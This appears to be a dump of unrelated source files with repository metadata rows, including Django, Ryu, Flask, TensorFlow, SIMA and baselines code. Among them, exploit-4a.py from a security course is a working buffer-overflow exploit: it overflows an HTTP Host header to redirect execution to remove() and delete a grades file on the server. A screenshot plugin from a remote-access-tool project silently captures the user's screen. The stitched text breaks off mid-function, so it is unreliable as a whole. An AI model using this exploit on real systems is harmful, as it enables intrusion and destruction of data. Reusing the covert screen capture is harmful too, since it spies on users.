for field_lookup_expr in lookup_exprs:
field_lookup = helpers.resolve_string_attribute_value(field_lookup_expr, django_context)
if field_lookup is None:
return None
field_lookups.append(field_lookup)
return field_lookups
def extract_proper_type_queryset_values(ctx: MethodContext, django_context: DjangoContext) -> MypyType:
# called on QuerySet, return QuerySet of something
assert isinstance(ctx.type, Instance)
assert isinstance(ctx.default_return_type, Instance)
model_type = _extract_model_type_from_queryset(ctx.type)
if model_type is None:
return AnyType(TypeOfAny.from_omitted_generics)
model_cls = django_context.get_model_class_by_fullname(model_type.type.fullname)
if model_cls is None:
return ctx.default_return_type
field_lookups = resolve_field_lookups(ctx.args[0], django_context)
if field_lookups is None:
return AnyType(TypeOfAny.from_error)
if len(field_lookups) == 0:
for field in django_context.get_model_fields(model_cls):
field_lookups.append(field.attname)
column_types: 'OrderedDict[str, MypyType]' = OrderedDict()
for field_lookup in field_lookups:
field_lookup_type = get_field_type_from_lookup(ctx, django_context, model_cls,
lookup=field_lookup, method='values')
if field_lookup_type is None:
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, AnyType(TypeOfAny.from_error)])
column_types[field_lookup] = field_lookup_type
row_type = helpers.make_typeddict(ctx.api, column_types, set(column_types.keys()))
return helpers.reparametrize_instance(ctx.default_return_type, [model_type, row_type])
| gpl-3.0 | -9,191,325,024,441,455,000 | 42.958333 | 119 | 0.667773 | false | 3.812105 | false | false | false |
nmahlangu/cs263-project-one | exploit-4a.py | 1 | 1843 | #!/usr/bin/python
import sys
import socket
import traceback
import urllib
import struct
# stack values
fd_addr = 0xbfffde10
return_addr = 0xbfffde0c
ebp_addr = 0xbfffde08
i_addr = 0xbfffddfc
value_addr = 0xbfffdbf4
envvar_addr = 0xbfffd9f4
# attack values
func_addr = 0x4007b170
ptr_to_file_addr = fd_addr + 0x8
file_str = "/home/httpd/grades.txt\n"
ret_addr = 0x4007b170
def build_exploit(shellcode):
req = "GET / HTTP/1.0\r\n" + "Host: " # GET request header
req += "a" * (ebp_addr - value_addr + 4) # padding
req += struct.pack("<I",func_addr) # remove()
req += struct.pack("<I",ret_addr) # fake return address (also remove())
req += struct.pack("<I",ptr_to_file_addr) # pointer to "grades.txt"
req += file_str # "grades.txt"
req += "\r\n\r\n" # GET request suffix
return req
def send_req(host, port, req):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print("Connecting to %s:%d..." % (host, port))
sock.connect((host, port))
print("Connected, sending request...")
sock.send(req)
print("Request sent, waiting for reply...")
rbuf = sock.recv(1024)
resp = ""
while len(rbuf):
resp = resp + rbuf
rbuf = sock.recv(1024)
print("Received reply.")
sock.close()
return resp
# execute request
if len(sys.argv) != 3:
print("Usage: " + sys.argv[0] + " host port")
exit()
try:
shellfile = open("shellcode.bin", "r")
shellcode = shellfile.read()
req = build_exploit(shellcode)
print("HTTP request:")
print(req)
resp = send_req(sys.argv[1], int(sys.argv[2]), req)
print("HTTP response:")
print(resp)
except:
print("Exception:")
print(traceback.format_exc())
| mit | 3,121,236,461,207,966,700 | 25.710145 | 85 | 0.585458 | false | 3.129032 | false | false | false |
vcpe-io/vcpe-hub | basic_qos_control/portstatistic_monitor.py | 4 | 6280 | """Project For Port Monitor on switches."""
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.topology.api import get_switch
from ryu.controller.handler import set_ev_cls
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.lib import hub
from setting.db.data_collection import switch_stat
from setting.routing.utils.calculate_route import check_switch_load
from routing_adjustment import Routing_UpdateEvent
from setting.variable import constant
import logging
import time
import datetime
class PortStatMonitor(app_manager.RyuApp):
_EVENTS = [Routing_UpdateEvent]
"""Class for Port Monitor."""
def __init__(self, *args, **kwargs):
"""Initial method."""
super(PortStatMonitor, self).__init__(*args, **kwargs)
self.topology_api_app = self
self.monitor_thread = hub.spawn(self._monitor)
hdlr = logging.FileHandler('sdn_log.log')
self.logger.addHandler(hdlr)
def _monitor(self):
while True:
switch_list = get_switch(self.topology_api_app, None)
switch_id_list = []
for datapath in switch_list:
self._update_sw_stas(datapath)
self._request_stats(datapath.dp)
switch_id_list.append(datapath.dp.id)
target_list = check_switch_load(switch_id_list, switch_stat,
constant.load_limitation)
            print 'target_list', target_list, len(target_list)
if len(target_list) > 0:
ev = Routing_UpdateEvent(target_list, constant.load_limitation)
# print 'evevevevevev', ev, ev.msg
self.send_event_to_observers(ev)
hub.sleep(1)
def _update_sw_stas(self, datapath):
"""Update statistics for switches method."""
# Initialization
if switch_stat.get(datapath.dp.id) is None:
alive_ports = []
switch_stat.update({datapath.dp.id: {'alive_port': alive_ports}})
# Update active ports in list
alive_port_list = switch_stat.get(datapath.dp.id).get('alive_port')
for port in datapath.ports:
if port.is_live():
if port.port_no not in alive_port_list:
alive_port_list.append(port.port_no)
            else:
                if port.port_no in alive_port_list:
                    alive_port_list.remove(port.port_no)
                    # Guard against 'stats' not existing yet; it is created
                    # lazily in the stats-reply handler.
                    p_stat = switch_stat.get(datapath.dp.id).get('stats')
                    if p_stat is not None and p_stat.get(port.port_no) is not None:
                        p_stat[port.port_no] = None
def _request_stats(self, datapath):
"""Send PortStatsRequest method."""
ofproto = datapath.ofproto
parser = datapath.ofproto_parser
req = parser.OFPPortStatsRequest(datapath, 0, ofproto.OFPP_ANY)
datapath.send_msg(req)
@set_ev_cls(ofp_event.EventOFPPortStatsReply, MAIN_DISPATCHER)
def _port_stats_reply_handler(self, ev):
"""Handle PortStatsReply from switches method."""
sw_dpid = ev.msg.datapath.id
# self.logger.info('-----------')
# self.logger.info(ev.msg.datapath.id)
# self.logger.info('-----------')
# Initialization
if switch_stat.get(sw_dpid).get('stats') is None:
switch_stat.get(sw_dpid).update({'stats': {}})
if switch_stat.get(sw_dpid).get('weight') is None:
switch_stat.get(sw_dpid).update({'weight': {}})
if switch_stat.get(sw_dpid).get('cost') is None:
switch_stat.get(sw_dpid).update({'cost': 0.0})
if switch_stat.get(sw_dpid).get('load') is None:
switch_stat.get(sw_dpid).update({'load': 0.0})
r = 0
t = 0
e = 0
for stat in ev.msg.body:
if stat.port_no in switch_stat.get(sw_dpid).get('alive_port'):
# Claculate statistics on each active port
# self.logger.info(stat.port_no)
counter_list = [stat.port_no, stat.rx_bytes, stat.tx_bytes, stat.rx_dropped, stat.tx_dropped, stat.rx_errors, stat.tx_errors, stat.collisions]
port_stat = {stat.port_no: counter_list}
p_r = 0
p_t = 0
p_e = 0
if switch_stat.get(sw_dpid).get('stats').get(stat.port_no) is not None:
his_stat = switch_stat.get(sw_dpid).get('stats').get(stat.port_no)
# self.logger.info('%s %s', counter_list, his_stat)
# self.logger.info('rx_byte %d', (counter_list[1] - his_stat[1])/1)
# self.logger.info('tx_byte %d', (counter_list[2] - his_stat[2])/1)
# self.logger.info('drop %d', (counter_list[3] - his_stat[3])/1)
p_r = (counter_list[1] - his_stat[1])/1
p_t = (counter_list[2] - his_stat[2])/1
p_e = (counter_list[3] + counter_list[4] - his_stat[3] - his_stat[4])/1
r = r + (counter_list[1] - his_stat[1])/1
t = t + (counter_list[2] - his_stat[2])/1
e = e + (counter_list[3] + counter_list[4] - his_stat[3] - his_stat[4])/1
weight_list = [p_r, p_t, p_e]
port_weight = {stat.port_no: weight_list}
# Update port statistics
sw_stat = switch_stat.get(sw_dpid).get('stats')
sw_stat.update(port_stat)
sw_weight = switch_stat.get(sw_dpid).get('weight')
sw_weight.update(port_weight)
# self.logger.info('=======')
# self.logger.info('cost function r : %d', r)
# self.logger.info('cost function t : %d', t)
# self.logger.info('cost function r-t: %d', r-t)
# self.logger.info('cost function d: %d', e)
# ts = time.time()
# st = datetime.datetime.fromtimestamp(ts).strftime('%Y-%m-%d %H:%M:%S')
# self.logger.info('time %s', st)
pp = r-t
if r != 0:
# self.logger.info('cost function: %f',float(pp)/float(r))
switch_stat.get(sw_dpid).update({'cost': float(pp)/float(r)})
switch_stat.get(sw_dpid).update({'load': [r, t, e]})
| apache-2.0 | -3,953,848,409,782,491,000 | 42.013699 | 158 | 0.554618 | false | 3.52809 | false | false | false |
insua1990/DAI | DAI-master/Flask/practica2.py | 1 | 1639 | # -*- coding: utf-8 -*-
from flask import Flask,request, url_for,render_template
import mandelbrot
import random
app = Flask(__name__)
@app.route("/user/pepe")
def pepe():
return "CONTENIDO WEB ESTATICO PARA PEPE"
@app.route("/user/zerjillo")
def zerjillo():
return "CONTENIDO WEB ESTATICO PARA ZERJILLO"
@app.route("/user/<name>")
def usuario(name):
return "CONTENIDO WEB ESTATICO PARA EL USUARIO : " + name
@app.route("/mandelbrot" , methods = ['POST'])
def mand():
x1 = float(request.form['x1'])
y1 = float(request.form['y1'])
x2 = float(request.form['x2'])
y2 = float(request.form['y2'])
witdh= int(request.form['witdh'])
mandelbrot.renderizaMandelbrot(x1,y1,x2,y2,witdh,500,"static/mandelbrot.png")
image='<img src=' + url_for('static',filename='mandelbrot.png') + ' width="50%" >'
return image
@app.route("/")
def hello():
enlace='<a href=' + "http://localhost:8080/static/index2.html" + '>' + "IR A PRACTICA 2" + "</a>"
return enlace
@app.route("/svg")
def svg():
    colors = ['blue', 'black']
    imagen = '<svg height="500px" width="500px">'
    for i in range(100):
        # One random circle per iteration.
        circulo = '<circle cx="' + str(random.randint(1, 500)) + '" cy="' + str(random.randint(1, 500)) + '" r="' + str(random.randint(1, 20)) + '" stroke="' + colors[random.randint(0, 1)] + '" stroke-width="' + str(random.randint(1, 2)) + '" fill="' + colors[random.randint(0, 1)] + '" />'
        imagen = imagen + circulo
    imagen = imagen + '</svg>'
    return imagen
@app.errorhandler(404)
def page_not_found(error):
return "Pagina no encontrada", 404
if __name__ == "__main__":
app.run(host='0.0.0.0',debug=True) | gpl-3.0 | -8,851,896,246,478,109,000 | 29.943396 | 257 | 0.639414 | false | 2.597464 | false | false | false |
deepmind/mc_gradients | monte_carlo_gradients/dist_utils.py | 1 | 2918 | # Copyright 2019 Deepmind Technologies Limited.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Distribution utilities."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import tensorflow_probability as tfp
tfd = tfp.distributions
def multi_normal(loc, log_scale):
return MultiNormalDiagFromLogScale(loc=loc, log_scale=log_scale)
class MultiNormalDiagFromLogScale(tfd.MultivariateNormalDiag):
"""MultiNormalDiag which directly exposes its input parameters."""
def __init__(self, loc, log_scale):
scale = tf.exp(log_scale)
self._log_scale = log_scale
self._input_mean = loc
super(MultiNormalDiagFromLogScale, self).__init__(
loc, scale)
@property
def input_mean(self):
return self._input_mean
@property
def log_scale(self):
return self._log_scale
@property
def dist_vars(self):
return [self.input_mean, self.log_scale]
def diagonal_gaussian_posterior(data_dims):
mean = tf.Variable(
tf.zeros(shape=(data_dims), dtype=tf.float32), name='mean')
log_scale = tf.Variable(
tf.zeros(shape=(data_dims), dtype=tf.float32), name='log_scale')
return multi_normal(loc=mean, log_scale=log_scale)
def std_gaussian_from_std_dsmaxwell(std_dsmaxwell_samples):
"""Generate Gaussian variates from Maxwell variates.
Useful for coupling samples from Gaussian and double_sided Maxwell dist.
1. Generate ds-maxwell variates: dsM ~ dsMaxwell(0,1)
  2. Generate uniform variates: u ~ Unif(0,1)
3. multiply y = u * dsM
The result is Gaussian distribution N(0,1) which can be loc-scale adjusted.
Args:
std_dsmaxwell_samples: Samples generated from a zero-mean, unit variance
double-sided Maxwell distribution M(0,1).
Returns:
Tensor of Gaussian variates with shape maxwell_samples.
"""
unif_rvs = tf.random.uniform(std_dsmaxwell_samples.shape)
gaussian_rvs = unif_rvs * std_dsmaxwell_samples
return gaussian_rvs
def sample_weibull(sh, scale, concentration):
distrib = tfp.distributions.TransformedDistribution(
distribution=tfp.distributions.Uniform(low=0., high=1. - 1e-6),
bijector=tfp.bijectors.Invert(
tfp.bijectors.Weibull(scale=scale, concentration=concentration)))
return distrib.sample(sh)
def sample_ds_maxwell(sh, loc, scale):
return tfd.DoublesidedMaxwell(loc=loc, scale=scale).sample(sh)
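# Hedged usage sketch (not in the original module): building the diagonal
# Gaussian defined above and drawing coupled Maxwell/Gaussian samples.
# Defined only; nothing runs at import time.
def _example_dist_usage():
  dist = diagonal_gaussian_posterior(data_dims=3)
  maxwell = sample_ds_maxwell([10], loc=tf.zeros(3), scale=tf.ones(3))
  gaussians = std_gaussian_from_std_dsmaxwell(maxwell)
  return dist, gaussians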
| apache-2.0 | 3,290,071,452,825,769,000 | 30.717391 | 77 | 0.733036 | false | 3.53697 | false | false | false |
SnowRomance/CMDB | order/migrations/0002_auto_20161229_1615.py | 1 | 1541 | # -*- coding: utf-8 -*-
# Generated by Django 1.9.6 on 2016-12-29 08:15
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('order', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='email',
name='content',
field=models.CharField(max_length=3000, null=True),
),
migrations.AddField(
model_name='email',
name='create_time',
field=models.DateField(default=datetime.datetime(2016, 12, 29, 16, 15, 9, 188000), verbose_name='\u521b\u5efa\u65f6\u95f4'),
),
migrations.AddField(
model_name='email',
name='from_user',
field=models.CharField(max_length=50, null=True),
),
migrations.AddField(
model_name='email',
name='status',
field=models.IntegerField(default=0),
),
migrations.AddField(
model_name='email',
name='title',
field=models.CharField(max_length=100, null=True),
),
migrations.AddField(
model_name='email',
name='to_user',
field=models.CharField(max_length=100, null=True),
),
migrations.AlterField(
model_name='email',
name='id',
field=models.AutoField(primary_key=True, serialize=False, verbose_name='\u90ae\u4ef6Id'),
),
]
| gpl-3.0 | 2,227,179,580,864,926,000 | 29.215686 | 136 | 0.549643 | false | 4.044619 | false | false | false |
losonczylab/sima | examples/scanbox.py | 3 | 2651 | """Example script to load Scanbox data as a SIMA sequence."""
from __future__ import division
import argparse
import fnmatch
import os
import numpy as np
import sima
from sima import imaging_parameters
def sbxread(path, info_path):
"""Read in an .sbx file and return a SIMA sequence.
Based off of the sbxRead Matlab implementation and
https://scanbox.org/2016/09/02/reading-scanbox-files-in-python/
Parameters
----------
path : str
Path to the Scanbox data file (including the .sbx extension).
info_path : str
Path to the Scanbox info MAT file.
"""
info = imaging_parameters.extract_imaging_parameters(
info_path, format='Scanbox')
nrows = info['recordsPerBuffer']
ncols = info['sz'][1]
nchannels = info['nchannels']
nplanes = info['nplanes']
nframes = (info['max_idx'] + 1) // nplanes
shape = (nchannels, ncols, nrows, nplanes, nframes)
seq = sima.Sequence.create(
'memmap', path=path, shape=shape, dim_order='cxyzt', dtype='uint16',
order='F')
max_uint16_seq = sima.Sequence.create(
'constant', value=np.iinfo('uint16').max, shape=seq.shape)
return max_uint16_seq - seq
def initialize_sbx_datasets(path, calc_time_averages=False):
"""Locate and initialize a SIMA dataset for all Scanbox sbx files."""
for directory, folders, files in os.walk(path):
for sbx_file in fnmatch.filter(files, '*.sbx'):
info_file = os.path.splitext(sbx_file)[0] + '.mat'
sima_dir = os.path.splitext(sbx_file)[0] + '.sima'
if info_file in files and sima_dir not in folders:
print("Initializing SIMA dataset: {}".format(
os.path.join(directory, sima_dir)))
seq = sbxread(
os.path.join(directory, sbx_file),
os.path.join(directory, info_file))
dset = sima.ImagingDataset(
[seq], savedir=os.path.join(directory, sima_dir))
if calc_time_averages:
print("Calculating time averages: {}".format(
os.path.join(directory, sima_dir)))
dset.time_averages
if __name__ == '__main__':
argParser = argparse.ArgumentParser()
argParser.add_argument(
"-t", "--time_averages", action="store_true",
help="Pre-calc time averages.")
argParser.add_argument(
"path", action="store", type=str, default=os.curdir,
help="Locate all Scanbox files below this path.")
args = argParser.parse_args()
initialize_sbx_datasets(args.path, args.time_averages)
| gpl-2.0 | -7,431,469,433,316,229,000 | 32.556962 | 76 | 0.60845 | false | 3.58728 | false | false | false |
martin882003/PyRAT | plugins/screenshot.py | 1 | 1230 | #!/usr/bin/env python
#-*- encoding:utf-8 -*-
# screenshot.py
from PyQt4.QtGui import QApplication, QPixmap
from os import environ, mkdir, listdir
from sys import argv, platform
from time import strftime, gmtime
class Screenshot(object):
def __init__(self):
if platform == 'win32':
self.usuario = environ['USERNAME']
else:
self.usuario = environ['USER']
if not 'screenshot' in listdir('./'):
mkdir('screenshot')
def capturarPantalla(self):
        # Use '-' instead of ':' in the timestamp; ':' is invalid in Windows
        # file names.
        time = strftime("%d %b %Y_%H-%M-%S", gmtime())
        imagen = './screenshot/' + self.usuario + '_' + time + '.png'
app = QApplication(argv)
winId = QApplication.desktop().winId()
width = QApplication.desktop().screenGeometry().width()
height = QApplication.desktop().screenGeometry().height()
captura = QPixmap.grabWindow(winId, 0, 0, width, height)
captura.save(imagen)
def main():
ss = Screenshot()
ss.capturarPantalla()
if __name__ == '__main__':
main()
| gpl-2.0 | -3,672,721,533,335,851,500 | 30.538462 | 77 | 0.509756 | false | 4.300699 | false | false | false |
haystack/eyebrowse-server | extension/views.py | 1 | 12847 | import datetime
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from django.db.models.aggregates import Sum
from django.db.models import Q
from django.shortcuts import get_object_or_404
from django.views.decorators.clickjacking import xframe_options_exempt
from django.views.decorators.csrf import csrf_exempt
from django.utils import timezone
from django.views.generic.simple import redirect_to
from annoying.decorators import ajax_request
from annoying.decorators import render_to
from accounts.models import UserProfile
from api.models import ChatMessage, MuteList
from api.models import EyeHistory
from api.models import EyeHistoryMessage
from api.models import Page
from api.models import Domain
from api.models import Ratings
from api.utils import humanize_time
from tags.models import Tag
from common.view_helpers import JSONResponse
from common.templatetags.gravatar import gravatar_for_user
from common.templatetags.filters import url_domain
from api.views import rating_get
from eyebrowse.settings import BASE_URL
import re
twitter_username_re = re.compile(r'@([A-Za-z0-9_]+)')
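# Hedged illustration (not in the original module): what the username regex
# above matches. Safe to call; it relies only on the `re` module already
# imported, and mirrors the substitution used in get_messages() below.
def _example_linkify_usernames(text):
    return twitter_username_re.sub(
        lambda m: '<a href="http://eyebrowse.csail.mit.edu/users/%s">%s</a>'
                  % (m.group(1), m.group(0)), text)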
def logged_in(request):
if request.user.is_authenticated():
return JSONResponse({'res': True,
'username': request.user.username})
else:
return JSONResponse({'res': False})
@login_required
def ticker_info(request):
timestamp = timezone.now() - datetime.timedelta(minutes=5)
followers = User.objects.filter(userprofile__followed_by=request.user)
history = EyeHistory.objects.filter(
start_time__gt=timestamp).order_by('-start_time').select_related()
most_recent_hist = None
mutelist_urls = MuteList.objects.filter(
user=request.user,
url__isnull=False
).values_list('url', flat=True)
mutelist_words = MuteList.objects.filter(
user=request.user, word__isnull=False
).values_list('word', flat=True)
    users = []
    seen_users = set()
    for h in history:
        # `users` holds display dicts, so track seen User objects in a set;
        # the original tested `h.user not in users`, which never matched and
        # allowed duplicate ticker entries.
        if h.user not in seen_users and h.user in followers:
            if most_recent_hist is None:
                show = True
                if len(mutelist_urls) > 0:
                    for m in mutelist_urls:
                        if m in h.url:
                            show = False
                if show and len(mutelist_words) > 0:
                    for m in mutelist_words:
                        if m in h.title:
                            show = False
                if show:
                    most_recent_hist = h
            seen_users.add(h.user)
            users.append({'username': h.user.username,
                          'pic_url': gravatar_for_user(h.user),
                          'url': '%s/users/%s' % (BASE_URL, h.user.username),
                          })
res = {}
res['online_users'] = sorted(users, key=lambda u: u['username'])
    if most_recent_hist is not None:
res['history_item'] = { 'username': most_recent_hist.user.username,
'pic_url': gravatar_for_user(most_recent_hist.user),
'user_url': '%s/users/%s' % (BASE_URL, most_recent_hist.user.username),
'url': most_recent_hist.url,
'title': most_recent_hist.title,
'favicon': most_recent_hist.favIconUrl,
'time_ago': humanize_time(timezone.now() - most_recent_hist.start_time)
}
t = Tag.objects.filter(user=request.user, domain=most_recent_hist.domain)
if t.exists():
res['history_item']['tag'] = {'name': t[0].name,
'color': t[0].color}
else:
res['history_item'] = None
return JSONResponse(res)
@csrf_exempt
@login_required
def bubble_info(request):
url = request.POST.get('url', '')
domain = url_domain(url)
timestamp = timezone.now() - datetime.timedelta(days=7)
used_users = []
active = []
followers = User.objects.filter(userprofile__followed_by=request.user)
eyehists = EyeHistory.objects.filter((
Q(url=url) | Q(domain=domain)) &
Q(start_time__gt=timestamp) &
~Q(user_id=request.user.id)
).order_by('-end_time').select_related()
for eyehist in eyehists:
if len(active) >= 6:
break
user = eyehist.user
if user not in used_users and user in followers:
old_level = 3
if eyehist.end_time > \
(timezone.now() - datetime.timedelta(minutes=5)):
old_level = 0
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=1)):
old_level = 1
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=24)):
old_level = 2
url_level = "site-level"
if eyehist.url == url:
url_level = "page-level"
active.append({'username': user.username,
'pic_url': gravatar_for_user(user),
'url': '%s/users/%s' % (BASE_URL, user.username),
'old_level': old_level,
'url_level': url_level,
'time_ago': humanize_time(
timezone.now() - eyehist.end_time)
})
used_users.append(user)
messages = EyeHistoryMessage.objects.filter(
Q(eyehistory__url=url) &
Q(post_time__gt=timestamp)
).order_by('-post_time').select_related()
about_message = None
user_url = None
username = None
message = None
for m in messages:
if m.eyehistory.user in followers:
message = m.message
about_message = humanize_time(
timezone.now() - m.post_time) + ' ago'
user_url = '%s/users/%s' % (BASE_URL, m.eyehistory.user.username)
username = m.eyehistory.user.username
break
if not about_message:
chat_messages = ChatMessage.objects.filter(
url=url).order_by('-date').select_related()
for c in chat_messages:
if c.author in followers:
about_message = humanize_time(timezone.now() - c.date) + ' ago'
message = '"%s"' % (c.message)
user_url = '%s/users/%s' % (BASE_URL, c.author.username)
username = c.author.username
break
if not about_message:
about_message = ''
message = ''
return JSONResponse({
'url': url,
'active_users': active,
'message': message,
'about_message': about_message,
'user_url': user_url,
'username': username,
})
@ajax_request
def profilepic(request):
url = gravatar_for_user(request.user)
url = 'https://%s' % url[7:]
return redirect_to(request, url)
@login_required
@ajax_request
def get_friends(request):
    # Default to '' so .lower() cannot raise AttributeError on a missing parameter.
    query = request.GET.get('query', '').lower()
user_prof = UserProfile.objects.get(user=request.user)
friends = user_prof.follows.all()
data = []
for friend in friends:
if not query or query in friend.user.username.lower():
data.append({'id': friend.id,
'name': '@%s' % (friend.user.username),
'avatar': gravatar_for_user(friend.user),
'type': 'contact'})
if len(data) > 5:
break
return {'res': data}
@login_required
@ajax_request
def get_messages(request):
url = request.GET.get('url', '')
messages = EyeHistoryMessage.objects.filter(eyehistory__url=url).order_by('-post_time').select_related()
message_list = []
for message in messages:
eye_hist = message.eyehistory
m = twitter_username_re.sub(lambda m: '<a href="http://eyebrowse.csail.mit.edu/users/%s">%s</a>' % (m.group(1), m.group(0)), message.message)
message_list.append({'message': m,
'post_time': str(message.post_time),
'username': eye_hist.user.username,
'pic_url': gravatar_for_user(eye_hist.user),
'user_url': '%s/users/%s' % (BASE_URL, eye_hist.user.username),
'hum_time': humanize_time(
timezone.now() - message.post_time) + ' ago'
})
return {
'result': {
'messages': message_list,
}
}
@login_required
@ajax_request
def active(request):
url = request.GET.get('url', '')
domain = url_domain(url)
timestamp = timezone.now() - datetime.timedelta(days=7)
used_users = []
active_users = []
active_dusers = []
eyehists = EyeHistory.objects.filter(
(Q(url=url) | Q(domain=domain)) &
Q(start_time__gt=timestamp) &
~Q(user_id=request.user.id)
).order_by('-end_time').select_related()
for eyehist in eyehists:
if len(used_users) >= 6:
break
user = eyehist.user
if user not in used_users:
old_level = 3
if eyehist.end_time > \
(timezone.now() - datetime.timedelta(minutes=5)):
old_level = 0
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=1)):
old_level = 1
elif eyehist.end_time > \
(timezone.now() - datetime.timedelta(hours=24)):
old_level = 2
if url == eyehist.url:
active_users.append({'username': user.username,
'pic_url': gravatar_for_user(user),
'resourceURI': '%s/users/%s' % (BASE_URL, user.username),
'old_level': old_level,
'time_ago': humanize_time(
timezone.now() - eyehist.end_time)
})
else:
active_dusers.append({'username': user.username,
'pic_url': gravatar_for_user(user),
'resourceURI': '%s/users/%s' % (BASE_URL, user.username),
'old_level': old_level,
'time_ago': humanize_time(
timezone.now() - eyehist.end_time)
})
used_users.append(user)
return {
'result': {
'page': active_users,
'domain': active_dusers
}
}
def get_stats(visits):
count = visits.count()
if count == 1:
count_text = '1 visit'
else:
count_text = '%s visits' % (count)
if count == 0:
time = '0 seconds'
else:
avg_time = float(visits.aggregate(Sum('total_time'))['total_time__sum'])/float(count)
time = humanize_time(datetime.timedelta(
milliseconds=avg_time))
time = re.sub('minutes', 'min', time)
time = re.sub('minute', 'min', time)
return count_text, time
@login_required
@ajax_request
def stats(request):
url = request.GET.get('url', '')
my_user = get_object_or_404(User, username=request.user.username)
my_visits = EyeHistory.objects.filter(user=my_user, url=url)
my_count, my_time = get_stats(my_visits)
total_visits = EyeHistory.objects.filter(url=url)
total_count, total_time = get_stats(total_visits)
domain = url_domain(url)
my_dvisits = EyeHistory.objects.filter(user=my_user, domain=domain)
my_dcount, my_dtime = get_stats(my_dvisits)
total_dvisits = EyeHistory.objects.filter(domain=domain)
total_dcount, total_dtime = get_stats(total_dvisits)
    domain, _ = Domain.objects.get_or_create(url=domain)
    page, _ = Page.objects.get_or_create(url=url, domain=domain)
domain_score = domain.agg_score
score = 0
error = "Success"
try:
rating = Ratings.objects.get(user=my_user,page=page)
score = rating.score
except Ratings.DoesNotExist:
error = "Failure: Rating does not exist"
res = {'my_count': my_count,
'my_time': my_time,
'total_count': total_count,
'total_time': total_time,
'my_dcount': my_dcount,
'my_dtime': my_dtime,
'total_dcount': total_dcount,
'total_dtime': total_dtime,
'score': score,
'domain_score': domain_score
}
return {
'result': res
}
| mit | -8,257,733,362,844,671,000 | 32.110825 | 149 | 0.535378 | false | 3.888317 | false | false | false |
openai/baselines | baselines/common/vec_env/vec_env.py | 1 | 6195 | import contextlib
import os
from abc import ABC, abstractmethod
from baselines.common.tile_images import tile_images
class AlreadySteppingError(Exception):
"""
Raised when an asynchronous step is running while
step_async() is called again.
"""
def __init__(self):
msg = 'already running an async step'
Exception.__init__(self, msg)
class NotSteppingError(Exception):
"""
Raised when an asynchronous step is not running but
step_wait() is called.
"""
def __init__(self):
msg = 'not running an async step'
Exception.__init__(self, msg)
class VecEnv(ABC):
"""
An abstract asynchronous, vectorized environment.
Used to batch data from multiple copies of an environment, so that
each observation becomes an batch of observations, and expected action is a batch of actions to
be applied per-environment.
"""
closed = False
viewer = None
metadata = {
'render.modes': ['human', 'rgb_array']
}
def __init__(self, num_envs, observation_space, action_space):
self.num_envs = num_envs
self.observation_space = observation_space
self.action_space = action_space
@abstractmethod
def reset(self):
"""
Reset all the environments and return an array of
observations, or a dict of observation arrays.
If step_async is still doing work, that work will
be cancelled and step_wait() should not be called
until step_async() is invoked again.
"""
pass
@abstractmethod
def step_async(self, actions):
"""
Tell all the environments to start taking a step
with the given actions.
Call step_wait() to get the results of the step.
You should not call this if a step_async run is
already pending.
"""
pass
@abstractmethod
def step_wait(self):
"""
Wait for the step taken with step_async().
Returns (obs, rews, dones, infos):
- obs: an array of observations, or a dict of
arrays of observations.
- rews: an array of rewards
- dones: an array of "episode done" booleans
- infos: a sequence of info objects
"""
pass
def close_extras(self):
"""
Clean up the extra resources, beyond what's in this base class.
Only runs when not self.closed.
"""
pass
def close(self):
if self.closed:
return
if self.viewer is not None:
self.viewer.close()
self.close_extras()
self.closed = True
def step(self, actions):
"""
Step the environments synchronously.
This is available for backwards compatibility.
"""
self.step_async(actions)
return self.step_wait()
def render(self, mode='human'):
imgs = self.get_images()
bigimg = tile_images(imgs)
if mode == 'human':
self.get_viewer().imshow(bigimg)
return self.get_viewer().isopen
elif mode == 'rgb_array':
return bigimg
else:
raise NotImplementedError
def get_images(self):
"""
Return RGB images from each environment
"""
raise NotImplementedError
@property
def unwrapped(self):
if isinstance(self, VecEnvWrapper):
return self.venv.unwrapped
else:
return self
def get_viewer(self):
if self.viewer is None:
from gym.envs.classic_control import rendering
self.viewer = rendering.SimpleImageViewer()
return self.viewer
class VecEnvWrapper(VecEnv):
"""
An environment wrapper that applies to an entire batch
of environments at once.
"""
def __init__(self, venv, observation_space=None, action_space=None):
self.venv = venv
super().__init__(num_envs=venv.num_envs,
observation_space=observation_space or venv.observation_space,
action_space=action_space or venv.action_space)
def step_async(self, actions):
self.venv.step_async(actions)
@abstractmethod
def reset(self):
pass
@abstractmethod
def step_wait(self):
pass
def close(self):
return self.venv.close()
def render(self, mode='human'):
return self.venv.render(mode=mode)
def get_images(self):
return self.venv.get_images()
def __getattr__(self, name):
if name.startswith('_'):
raise AttributeError("attempted to get missing private attribute '{}'".format(name))
return getattr(self.venv, name)
class VecEnvObservationWrapper(VecEnvWrapper):
@abstractmethod
def process(self, obs):
pass
def reset(self):
obs = self.venv.reset()
return self.process(obs)
def step_wait(self):
obs, rews, dones, infos = self.venv.step_wait()
return self.process(obs), rews, dones, infos
class CloudpickleWrapper(object):
"""
Uses cloudpickle to serialize contents (otherwise multiprocessing tries to use pickle)
"""
def __init__(self, x):
self.x = x
def __getstate__(self):
import cloudpickle
return cloudpickle.dumps(self.x)
def __setstate__(self, ob):
import pickle
self.x = pickle.loads(ob)
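# Hedged usage sketch (not in the original module): round-tripping a lambda
# through CloudpickleWrapper, which plain pickle cannot serialize on its own.
# Assumes cloudpickle is installed; defined only, never executed at import.
def _example_cloudpickle_roundtrip():
    import pickle
    wrapped = CloudpickleWrapper(lambda x: x + 1)
    restored = pickle.loads(pickle.dumps(wrapped))
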